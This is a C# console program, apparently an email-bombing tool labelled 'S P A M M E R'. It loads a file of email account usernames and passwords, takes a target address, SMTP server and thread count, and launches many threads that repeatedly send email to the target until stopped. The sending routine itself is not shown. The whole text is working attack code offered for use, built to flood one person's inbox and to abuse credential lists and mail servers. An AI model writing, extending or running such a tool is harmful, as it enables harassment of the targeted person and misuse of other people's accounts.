static void Worker() { while (work) { EmailSpam.SendEmail(); } }
static void Main(string[] args) { Console.ForegroundColor = ConsoleColor.Gray; Thread counter = new Thread(setTitle) { IsBackground = false }; counter.Start(); Console.WriteLine("S P A M M E R"); EmailSpam.LoadData(); Console.Write("Target email: "); targetemail = Console.ReadLine(); if (!File.Exists("config.txt")) { Console.WriteLine("No config file detected, creating new one!"); Console.Write("Accounts path: "); accountstxtpath = Console.ReadLine().Replace("\"", "").Trim(); Console.Write("SMTP Server ( "); smtpserver = Console.ReadLine(); Console.Write("Domain ( "); domain = Console.ReadLine(); Console.Write("Threads: "); threads = int.Parse(Console.ReadLine()); File.WriteAllText("config.txt", string.Join("\r\n", new[] { smtpserver, domain, threads.ToString(), accountstxtpath })); } else { LoadConfig(); } accounts = File.ReadAllLines(accountstxtpath); user = new string[accounts.Length]; password = new string[accounts.Length]; for (int i = 0; i < accounts.Length; i++) { string help = (accounts[i].ToString()); user[i] = help.Split(':')[0]; password[i] = help.Split(':')[1]; } if (user.Length == password.Length) { Console.WriteLine($"Loaded {user.Length} users and {password.Length} passwords! Everything are good!"); } else { Console.WriteLine($"Something went wrong with accounts, detected {user.Length} users and {password.Length} :O"); return; } work = true; List <Thread> workers = new List <Thread>(); for (int i = 0; i < threads; i++) { Thread t = new Thread(Worker); t.Start(); workers.Add(t); } while (true) { if (Console.ReadLine().Trim().ToLower() == "stop") { Console.WriteLine(); Console.WriteLine("Stopping... this is can take a while..."); Console.WriteLine(); work = false; foreach (Thread t in workers) { t.Join(); } break; } } Console.WriteLine("SPAMMER Stoped!"); Console.ReadKey(); }